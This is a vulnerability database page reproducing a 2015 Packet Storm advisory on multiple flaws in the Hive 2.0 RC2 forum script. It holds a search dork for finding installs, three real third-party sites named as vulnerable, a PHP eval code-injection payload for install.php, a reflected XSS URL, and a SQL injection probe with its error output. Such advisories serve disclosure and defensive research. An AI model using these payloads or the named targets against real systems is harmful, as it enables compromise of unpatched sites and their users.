Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormIndoushkaPACKETSTORM:132136
HistoryJun 03, 2015 - 12:00 a.m.

Hive 2.0 RC2 XSS / Code Execution / SQL Injection

2015-06-0300:00:00
indoushka
packetstormsecurity.com
32
JSON
`| # Title : Hive v2.0 RC2 Multi Vulnerability   
| # Author : indoushka   
| # email : [email protected]   
| # Dork : "Powered by DigitalHive"   
| # Tested on: windows 8.1 Français V.(Pro)   
| # Bug : Stop Script  
| # Download : http:///www.digitalhive.com   
=======================================  
Stop SCript working :  
  
monocircus.free.fr/Forum/install/install.php?var=finish  
sgdf.rodez.free.fr/forum/index.php  
espace-associatif.org/forum/install/install.php  
  
PHP code injection :  
  
Vulnerability description  
This script is vulnerable to PHP code injection.  
  
PHP code injection is a vulnerability that allows an attacker to inject custom code into the server side scripting engine. This vulnerability occurs when an attacker can control all or part of an input string that is fed into an eval() function call. Eval will execute the argument as code.  
This vulnerability affects /hive/install/install.php.   
  
Attack details  
URL encoded POST input base was set to ${@print(md5(test))}  
Possible execution result: 63c19a6da79816b21429e5bb262daed8  
  
Xss :  
  
http://localhost//hive/base.php?mt=1%22%20onmouseover%3dprompt%28933088%29%20bad%3d%22&page=membres.php  
  
SQL injection :  
  
This vulnerability affects /hive/base.php.   
Attack details  
URL encoded POST input location was set to 1'"  
Error message found:   
supplied argument is not a valid MySQL result  
  
Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================  
Greetz :   
Exploit-db Team :   
(loneferret+Exploits+dookie2000ca)  
all my friend :  
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)  
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/  
www.securityreason.com * www.sa-hacker.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net  
---------------------------------------------------------------------------------------------------------------  
`
JSON